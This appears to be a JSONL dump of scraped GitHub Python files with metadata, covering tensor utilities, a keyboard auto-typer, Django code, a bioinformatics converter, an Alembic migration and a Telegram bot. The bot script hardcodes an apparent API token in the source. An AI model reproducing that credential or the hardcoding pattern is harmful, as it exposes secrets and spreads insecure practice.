"call"}, {"api_name": "rootio.Histogram.Histogram", "line_number": 179, "usage_type": "call"}, {"api_name": "rootio.TDirectory", "line_number": 224, "usage_type": "call"}, {"api_name": "rootio.IOData.IOData.kStreamer", "line_number": 280, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 280, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.StlNames", "line_number": 281, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 281, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kSTLmap", "line_number": 287, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 287, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kSTLmultimap", "line_number": 287, "usage_type": "attribute"}, {"api_name": "rootio.ROOT.ROOT.GetTypeId", "line_number": 299, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 299, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 299, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kBits", "line_number": 303, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 303, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kUInt", "line_number": 303, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData.kCounter", "line_number": 305, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 305, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kInt", "line_number": 305, "usage_type": "attribute"}, {"api_name": "rootio.TBuffer", "line_number": 324, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 383, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 398, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 408, "usage_type": "call"}, {"api_name": "rootio.StreamerDict.Streamers.CustomStreamers", "line_number": 442, "usage_type": "attribute"}, {"api_name": "rootio.StreamerDict.Streamers", "line_number": 442, "usage_type": "name"}, {"api_name": "rootio.ROOT.ROOT.AddClassMethods", "line_number": 453, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 453, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 453, "usage_type": "name"}, {"api_name": "box.BoxList", "line_number": 456, "usage_type": "attribute"}, {"api_name": "rootio.ROOT.ROOT.CreateMember", "line_number": 480, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 480, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 480, "usage_type": "name"}, {"api_name": "rootio.ROOT.ROOT.AddClassMethods", "line_number": 489, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 489, "usage_type": "name"}]} +{"seq_id": "23740386569", "text": "import numpy as np\nimport torch\n\ndef sort_tensor(inp_tensor, sort_column_id):\n \"\"\"\n Sort a tensor according the contents of a column\n Params ::\n inp_tensor: Tensor: Tensor to be sorted\n sort_column_id: int: index of column used for sorting\n Return ::\n (out_tensor, idx): Tuple: (Sorted Tensor, idx used for sorting)\n \"\"\"\n sort_column = inp_tensor[:, sort_column_id] \n _, idx = sort_column.sort()\n out_tensor = inp_tensor.index_select(0, idx)\n return (out_tensor, idx)\n\ndef tensor_elements_split(inp_tensor, to_pop, device=None, is_index=True):\n \"\"\"\n Pop elements from an input tensor\n Params ::\n inp_tensor: tensor: Input Tensor\n 
to_pop: array array like: \n collection of indexes or elements to pop from inp_tensor\n device: Torch.Device\n Device to store the tensors.\n is_index: Boolean: if set to True, to_pop is treated as indices. If False\n to_pop is treated as list of elements. Default is True\n Return ::\n Tuple(popped_tensor, popped_elements)\n popped_tensor: Tensor of type inp_tensor: Input tensor with the \n popped elements removed\n popped_elements: Tensor of type inp_tensor: Tensor of popped rows\n \n \"\"\"\n if device is None:\n device = torch.device(\"cpu\")\n if is_index is True:\n idx_to_keep = torch.tensor([id for id in range(inp_tensor.size(0)) \n if id not in to_pop], \n device=device, dtype=torch.long)\n if not torch.is_tensor(to_pop):\n to_pop = torch.tensor(to_pop, device=device, dtype=torch.long)\n popped_elements = inp_tensor.index_select(0, to_pop)\n popped_tensor = inp_tensor.index_select(0, idx_to_keep)\n\n else:\n raise NotImplementedError()\n return (popped_tensor, popped_elements)\n\ndef get_mean_absolute_error(X_test, y_test, gpr_model, y_mean=None, y_scale=None):\n \"\"\"\n y_true: torch Tensor\n True response.\n y_predicted: torch Tensor\n Predicted response.\n \n Returns\n -------\n float\n Mean Absolute Error\n\n \"\"\"\n with torch.no_grad():\n gpr_model.eval();\n posterior = gpr_model.posterior(X_test)\n abs_error = torch.abs(y_test - posterior.mean)\n if y_mean is not None and y_scale is not None:\n abs_error = abs_error * y_scale + y_mean\n return float(torch.mean(abs_error, axis=0).cpu().numpy())\n\ndef normalize_tensor(in_tensor, dim=0, mean_=None, std_deviation_=None):\n \"\"\"Normalize a vector\n\n Parameters\n ----------\n in_tensor: torch.Tensor\n Tensor to normalize.\n dim: int\n Dimension to normalize along. Only needed if the tensors own statistics\n is used to normalize it (mean_ and std_deviation_ not supplied). \n Default is 0.\n mean_: torch.Tensor\n Mean used to center the Tensor. Not needed if the tensors own statistics\n is used to normalize it.\n \n std_deviation_: torch.Tensor\n Standard deviation used to scale the Tensor. Not needed if the tensors \n own statistics is used to normalize it.\n \n Returns\n -------\n dict\n 'normalized': transformed tensor,\n 'std':\n 'mean':\n \n \"\"\" \n if mean_ is None or std_deviation_ is None:\n print('Normalizing vector using its own statistics')\n mean_ = in_tensor.mean(dim=dim)\n std_deviation_ = in_tensor.std(dim=dim)\n return {\n 'normalized': (in_tensor - mean_) / std_deviation_,\n 'std': std_deviation_,\n 'mean': mean_\n }\n\n\ndef scaleup_tensor(in_tensor, mean_, std_deviation_):\n \"\"\"Scaleup or \"un-normalize\" a tensor\n\n Parameters\n ----------\n in_tensor: torch.Tensor\n Tensor to normalize.\n\n mean_: torch.Tensor\n Mean used to re-center the Tensor. 
\n \n std_deviation_: torch.Tensor\n Standard deviation used to re-scale the Tensor.\n Returns\n -------\n torch.Tensor\n Scaledup Tensor.\n\n \"\"\"\n return in_tensor * std_deviation_ + mean_\n\n\n\ndef train_test_split(X, train_fraction, random_seed, y=None, device=None):\n train_size = int(train_fraction * X.shape[0]) \n \n np.random.seed(random_seed)\n initial_idx = list(np.random.choice(X.shape[0], \n train_size,\n replace=False))\n X_test, X_train = tensor_elements_split(X, to_pop=initial_idx, device=device)\n if y is not None:\n y_test, y_train = tensor_elements_split(y, \n to_pop=initial_idx, \n device=device)\n return X_train, X_test, y_train, y_test\n else:\n return X_train, X_test\n\ndef move_test_to_train(training_data, test_data, id_of_point_to_move):\n \"\"\" Move a point from test to training dataset\n \n Parameters\n ---------\n training_data: tuple\n (X_train, y_train).\n test_data: tuple\n (X_test, y_test)\n id_of_point_to_move: int\n Index of point to move from test to trainind set. \n Index is in reference to test data before operation.\n \n Returns\n -------\n tuple\n (X_train_new, y_train_new), (X_test_new, y_test_new)\n\n \"\"\"\n (X_train, y_train) = training_data\n (X_test, y_test) = test_data \n X_test_new, X_new = tensor_elements_split(inp_tensor=X_test,\n to_pop=id_of_point_to_move)\n y_test_new, y_new = tensor_elements_split(inp_tensor=y_test,\n to_pop=id_of_point_to_move)\n X_train_new = torch.cat((X_train, X_new))\n y_train_new = torch.cat((y_train, y_new))\n return (X_train_new, y_train_new), (X_test_new, y_test_new)\n\ndef get_new_point_to_acquire(acq_vals, test_data=None):\n max_acqf_id = acq_vals.argmax()\n if test_data is not None:\n (X_test, y_test) = test_data\n new_point_X = X_test.index_select(0, max_acqf_id)\n new_point_y = y_test.index_select(0, max_acqf_id)\n return (new_point_X, new_point_y), max_acqf_id\n else: \n return max_acqf_id\n\n\ndef detach_tensor_to_numpy(in_tensor):\n if torch.is_tensor(in_tensor):\n return in_tensor.detach().numpy()\n return in_tensor\n\n \n", "repo_name": "himaghna/phosphine-ligands", "sub_path": "active-learning/tensor_ops.py", "file_name": "tensor_ops.py", "file_ext": "py", "file_size_in_byte": 6278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 190, "usage_type": "call"}]} +{"seq_id": "19663640352", "text": "import 
time\nimport threading\nimport os\nfrom pygame import mixer\nfrom pynput import keyboard\n\nTEXT_PATH = \"texts/\"\ndelay = 0.025\n\nkeys = {eval(f\"keyboard.Key.f{i+1}\"): \"\" for i in range(12)}\ntexts = []\nfor root, dirs, files in os.walk(TEXT_PATH):\n for i,x in enumerate(zip(files, keys)):\n file, key = x\n with open(os.path.join(TEXT_PATH, file), 'r') as f:\n keys[key] = f.read()\n \n\nmixer.init()\nmixer.music.load(\"typing.mp3\")\nmixer.music.set_volume(0.5)\n\n\nstopped = False\n\ndef type_text(text):\n global stopped\n mixer.music.play(-1)\n k = keyboard.Controller()\n for char in text:\n if char == \"\\n\":\n char = keyboard.Key.enter\n # elif char == \" \":\n # char = keyboard.Key.space\n k.press(char)\n time.sleep(delay)\n k.release(char)\n if stopped:\n break\n mixer.music.stop()\n \n\ndef on_press(key):\n global stopped\n if key in keys:\n stopped = False\n t = threading.Thread(target = type_text, args = [keys[key]])\n t.start()\n elif key == keyboard.Key.pause:\n stopped = True\n elif key == keyboard.Key.esc:\n listener.stop()\n\n\nwith keyboard.Listener(on_press=on_press) as listener:\n listener.join()", "repo_name": "SSSCodingClub/AutoClickerAndTyper", "sub_path": "main2.py", "file_name": "main2.py", "file_ext": "py", "file_size_in_byte": 1254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 19, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 20, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 21, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": "name"}, {"api_name": "pynput.keyboard.Controller", "line_number": 29, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 29, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 32, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mixer.music.stop", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 40, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 47, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 49, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 51, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 55, "usage_type": 
"call"}, {"api_name": "pynput.keyboard", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "9835090550", "text": "from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.loader import render_to_string\n\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_sniperlink_for_email(sniperlinks, email):\n if sniperlinks and email in sniperlinks:\n return sniperlinks[email]\n\n\n@register.simple_tag(takes_context=True)\ndef unverified_email_banner(context, banner_class=\"\", link_class=\"\"):\n sniperlinks = context['sniperlinks']\n context['banner_class'] = banner_class\n context['link_class'] = link_class\n html = ''\n # Check if the user has any unverified email addresses from allauth\n if sniperlinks:\n # Loop through the sniperlinks in the context.\n for email in sniperlinks:\n banner_context = context.flatten()\n link = sniperlinks[email]['link']\n if link:\n banner_context['email'] = email\n banner_context['link'] = link\n banner_context['img'] = sniperlinks[email]['img']\n html += render_to_string('allauth_sniperlinks/banner.html', banner_context)\n\n # Return the HTML as a safe string\n return mark_safe(html)\n", "repo_name": "skulegirl/django-allauth-sniperlinks", "sub_path": "allauth_sniperlinks/templatetags/sniperlink_tags.py", "file_name": "sniperlink_tags.py", "file_ext": "py", "file_size_in_byte": 1174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 31, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "10114299163", "text": "import pandas as pd\nfrom django.db import connection\nfrom ..Utilitarios.Logs import Logs\n\n\nclass BD_Calificaciones:\n \n @staticmethod\n def consultaCalificacioneceb() -> pd.DataFrame:\n try:\n CONSULTA = \"\"\" SELECT eceb.ECX_FECHA,eceb.RUC_ENTIDAD,ef.ENTIDAD_NOMBRE,eceb.ECX_FIRMA_CAL_RIESGO,\n eceb.ECX_CALIFICACION,eceb.ECX_TIPO FROM ENTIDAD_CAL_EXT_BCO eceb \n INNER JOIN ENTIDAD_FINANCIERA ef on eceb.RUC_ENTIDAD = ef.RUC_ENTIDAD \"\"\"\n \n \n with connection.cursor() as cursor:\n cursor.execute(\"SET NOCOUNT ON\")\n cursor.execute(CONSULTA)\n resultado = cursor.fetchall()\n columnas = [col[0] for col in cursor.description]\n df = pd.DataFrame(resultado, columns=columnas)\n cursor.execute(\"SET NOCOUNT OFF\")\n return df\n except Exception:\n mensaje = \"Error al consultar Calificacion eceb\"\n Logs.registrarLog(mensaje)\n raise Exception(mensaje)\n \n \n @staticmethod\n def consultaCalificacionesecic() -> pd.DataFrame:\n try:\n CONSULTA = \"\"\" SELECT ecic.ECI_FECHA,ecic.RUC_ENTIDAD,ef.ENTIDAD_NOMBRE ,ecic.ECI_PUNTAJE,\n ecic.ECI_CALIFICACION,ecic.ECI_TIPO FROM ENTIDAD_CAL_INT_COAC ecic \n INNER JOIN ENTIDAD_FINANCIERA ef on ecic.RUC_ENTIDAD = ef.RUC_ENTIDAD \"\"\"\n \n \n with connection.cursor() as cursor:\n cursor.execute(\"SET NOCOUNT ON\")\n cursor.execute(CONSULTA)\n resultado = cursor.fetchall()\n columnas = [col[0] for col in cursor.description]\n df = pd.DataFrame(resultado, columns=columnas)\n cursor.execute(\"SET NOCOUNT OFF\")\n return df\n except Exception:\n mensaje = \"Error al consultar Calificacion ecic\"\n Logs.registrarLog(mensaje)\n raise Exception(mensaje)\n\n\n", "repo_name": "AlvaroValver-de/Api", 
"sub_path": "tesoreria_app/Persistencia/Calificaciones.py", "file_name": "Calificaciones.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.db.connection.cursor", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 21, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs.registrarLog", "line_number": 26, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs", "line_number": 26, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.connection.cursor", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 38, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs.registrarLog", "line_number": 48, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs", "line_number": 48, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "13401761508", "text": "from ..node import Node, NodeType\nfrom ..types import TypeIdentifier, Dimensions\nfrom .expression import Expression\nfrom .array_expr import ArrayExpression\nfrom ..utils import throw_invalid_type\nfrom typing import List, Optional\n\n\nclass ArrayCreationExpression(Expression):\n\n def __init__(self,\n node_type: NodeType,\n type: TypeIdentifier,\n dimensions: Dimensions,\n value: Optional[ArrayExpression] = None):\n super().__init__(node_type)\n self.type_id = type\n self.dimensions = dimensions\n self.value = value\n self._check_types()\n\n def _check_types(self):\n if self.node_type != NodeType.ARRAY_CREATION_EXPR:\n throw_invalid_type(self.node_type, self)\n if self.type_id.node_type != NodeType.TYPE_IDENTIFIER:\n throw_invalid_type(self.type_id.node_type, self, 'type')\n if self.dimensions.node_type != NodeType.DIMENSIONS:\n throw_invalid_type(self.dimensions.node_type, self, 'dimensions')\n if (self.value is not None and self.value.node_type != NodeType.ARRAY_EXPR):\n throw_invalid_type(self.value.node_type, self, 'value')\n\n def get_children(self) -> List[Node]:\n res = [self.type_id, self.dimensions]\n if self.value is not None:\n res.append(self.value)\n return res\n\n def get_children_names(self) -> List[str]:\n return ['type_id', 'dimensions', 'value']\n", "repo_name": "YBRua/SrcMarker", "sub_path": "mutable_tree/nodes/expressions/array_creation_expr.py", "file_name": "array_creation_expr.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "expression.Expression", "line_number": 9, "usage_type": "name"}, {"api_name": "node.NodeType", "line_number": 12, "usage_type": "name"}, {"api_name": "types.TypeIdentifier", "line_number": 13, "usage_type": "name"}, {"api_name": "types.Dimensions", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "array_expr.ArrayExpression", "line_number": 15, "usage_type": "name"}, {"api_name": "node.NodeType.ARRAY_CREATION_EXPR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", 
"line_number": 24, "usage_type": "call"}, {"api_name": "node.NodeType.TYPE_IDENTIFIER", "line_number": 25, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 26, "usage_type": "call"}, {"api_name": "node.NodeType.DIMENSIONS", "line_number": 27, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 27, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 28, "usage_type": "call"}, {"api_name": "node.NodeType.ARRAY_EXPR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "node.Node", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "5019070636", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom .models import CourseOrg, CityDict\n\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\n# Create your views here.\n\n\nclass OrgView(View):\n '''\n 课程机构列表功能\n '''\n def get(self, request):\n # 课程机构\n all_orgs = CourseOrg.objects.all()\n # 热门机构的提取\n hot_orgs = all_orgs.order_by(\"click_num\")[:3]\n\n # 城市\n all_citys = CityDict.objects.all()\n\n # 去除筛选城市\n city_id = request.GET.get('city', \"\")\n if city_id:\n all_orgs = all_orgs.filter(city_id=int(city_id))\n # 类别筛选\n category = request.GET.get('ct', \"\")\n if category:\n all_orgs = all_orgs.filter(category=category)\n\n sort = request.GET.get ('sort', \"\")\n if sort:\n if sort == \"students\":\n all_orgs = all_orgs.order_by(\"-students\") # - 倒叙排序\n elif sort == \"courses\":\n all_orgs = all_orgs.order_by(\"-course_nums\")\n\n org_nums = all_orgs.count ()\n # 对课程机构进行分页\n try:\n page = request.GET.get ('page', 1)\n except PageNotAnInteger:\n page = 1\n # 必须设置每页显示的数量 per_page的值\n p = Paginator(all_orgs, 3,request=request)\n\n orgs = p.page (page)\n\n return render(request, \"org-list.html\", {\n \"all_orgs\": orgs,\n \"all_citys\": all_citys,\n \"org_nums\": org_nums,\n \"city_id\":city_id, # 传递city_id到templates中\n \"category\":category,\n \"hot_orgs\":hot_orgs,\n \"sort\":sort,\n })", "repo_name": "1mrliu/MxOnline", "sub_path": "apps/organization/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.View", "line_number": 12, "usage_type": "name"}, {"api_name": "models.CourseOrg.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.CourseOrg.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.CourseOrg", "line_number": 18, "usage_type": "name"}, {"api_name": "models.CityDict.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.CityDict.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.CityDict", "line_number": 23, "usage_type": "name"}, {"api_name": "pure_pagination.PageNotAnInteger", "line_number": 45, "usage_type": "name"}, {"api_name": "pure_pagination.Paginator", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}]} 
+{"seq_id": "30312075289", "text": "import click\r\nfrom Bio import SeqIO\r\n\r\n@click.command()\r\n@click.option('--gb',help=\"The path of your genbank file.\")\r\n@click.option('--protein_fasta',help=\"The path of output protein fasta.\")\r\n@click.option('--gff',help=\"The path of output gff\")\r\n\r\n\r\ndef generate_MCScanX_input(gb,protein_fasta,gff):\r\n \"\"\"output protein fasta and simple gff.\"\"\"\r\n fw01 = open(protein_fasta,'w')\r\n fw02 = open(gff,'w')\r\n seq_ids = []\r\n for rec in SeqIO.parse(gb,'gb'):\r\n for feature in rec.features:\r\n if feature.type == \"CDS\" and feature.qualifiers['gene'][0] != 'rps12':\r\n protein_seq = feature.extract(rec.seq).translate()\r\n seq_id = feature.qualifiers['gene'][0]\r\n if seq_id not in seq_ids:\r\n seq_ids.append(seq_id)\r\n fw01.write(\">%s\\n%s\\n\"%(seq_id,str(protein_seq).replace(\"*\",\"\")))\r\n \r\n start = feature.location.start + 1\r\n \r\n end = feature.location.end\r\n \r\n chromosome = rec.annotations['organism'].replace(' ','_')\r\n \r\n fw02.write(\"%s\\t%s\\t%d\\t%d\\n\"%(chromosome,seq_id,start,end))\r\n \r\n fw01.close();fw02.close()\r\n \r\n click.echo(f\"Well done, you got { protein_fasta } and { gff }!\")\r\n \r\nif __name__ == '__main__':\r\n generate_MCScanX_input()", "repo_name": "NotebookOFXiaoMing/pomeChloroplast", "sub_path": "08.cosynteny/generate_MCScanX_input.py", "file_name": "generate_MCScanX_input.py", "file_ext": "py", "file_size_in_byte": 1436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 15, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 34, "usage_type": "call"}, {"api_name": "click.command", "line_number": 4, "usage_type": "call"}, {"api_name": "click.option", "line_number": 5, "usage_type": "call"}, {"api_name": "click.option", "line_number": 6, "usage_type": "call"}, {"api_name": "click.option", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "11984212319", "text": "import openai\n\nENGINE = 'text-davinci-003'\nMAX_TOKENS = 1500\nTEMPERATURE = 0.0\ndef complete(prompt):\n completion = openai.Completion.create(\n engine=ENGINE,\n prompt=prompt,\n max_tokens=MAX_TOKENS,\n temperature=TEMPERATURE,\n stream=False,\n )\n\n return completion['choices'][0]['text']", "repo_name": "RafaelCosman/autocoder", "sub_path": "llm_interface.py", "file_name": "llm_interface.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "openai.Completion.create", "line_number": 7, "usage_type": "call"}, {"api_name": "openai.Completion", "line_number": 7, "usage_type": "attribute"}]} +{"seq_id": "74933284009", "text": "\"\"\"status and type are added\n\nRevision ID: 44db2275fc7f\nRevises: 59a1a716bd4b\nCreate Date: 2022-09-23 21:45:39.094275\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '44db2275fc7f'\ndown_revision = '59a1a716bd4b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n status_choice_enum = postgresql.ENUM('pending', 'checked', 'approved', 'finished', 'confirmed', name='statuschoice', create_type=False)\n status_choice_enum.create(op.get_bind(), checkfirst=True)\n\n type_choice_enum = postgresql.ENUM('with_self', 'with_budget', name='typechoice', create_type=False)\n type_choice_enum.create(op.get_bind(), checkfirst=True)\n\n op.add_column('client_shtatkas', sa.Column('status', status_choice_enum, nullable=True))\n op.add_column('client_shtatkas', sa.Column('type', type_choice_enum, nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('client_shtatkas', 'type')\n op.drop_column('client_shtatkas', 'status')\n # ### end Alembic commands ###\n", "repo_name": "bakhtiyorovdilshod/shtatka", "sub_path": "migrations/versions/44db2275fc7f_status_and_type_are_added.py", "file_name": "44db2275fc7f_status_and_type_are_added.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 35, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "5737330115", "text": "import telebot\nfrom main import predict\n\nTOKEN = '6100411855:AAGRq3PAPIkUgMlxmpfWudXDfU8n3uTqmj80'\nbot = telebot.TeleBot(TOKEN)\n\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n print_user(message)\n ans = predict(message.text)\n bot.send_message(message.from_user.id, ans)\n\n\ndef print_user(message):\n print(message.from_user.full_name, message.text, message.from_user.username)\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True, interval=0)\n", "repo_name": "Murloc02/URL_Checker", "sub_path": "Telebot.py", "file_name": "Telebot.py", "file_ext": "py", "file_size_in_byte": 492, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telebot.TeleBot", "line_number": 5, "usage_type": "call"}, {"api_name": "main.predict", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "22618637633", "text": "import os, pathlib, shutil, 
